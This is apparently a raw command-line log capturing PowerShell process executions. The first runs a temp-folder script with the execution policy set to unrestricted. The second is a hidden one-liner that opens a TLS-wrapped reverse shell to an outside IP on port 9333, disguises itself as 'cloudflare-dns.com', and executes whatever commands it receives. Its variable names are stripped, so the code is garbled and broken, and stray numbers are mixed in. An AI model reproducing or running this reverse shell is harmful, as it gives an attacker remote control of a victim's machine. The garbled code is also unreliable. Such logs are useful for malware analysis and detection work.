powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\tryme.ps1
880powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -W hidden -noni -ep bypass -c " = New-Object Net.Sockets.TCPClient('198.58.102.19', 9333); = .GetStream(); = New-Object Net.Security.SslStream(,False,({True} -as [Net.Security.RemoteCertificateValidationCallback]));.AuthenticateAsClient('cloudflare-dns.com',,False);if(!.IsEncrypted -or !.IsSigned) {.Close();exit} = New-Object IO.StreamWriter();function WriteToStream () {[byte[]] = 0...ReceiveBufferSize | % {0};.Write( + 'SHELL> ');.Flush()};WriteToStream '';while(( = .Read(, 0, .Length)) -gt 0) { = ([text.encoding]::UTF8).GetString(, 0, - 1); = try {Invoke-Expression 2>&1 | Out-String} catch { | Out-String}WriteToStream ()}.Close()"
2188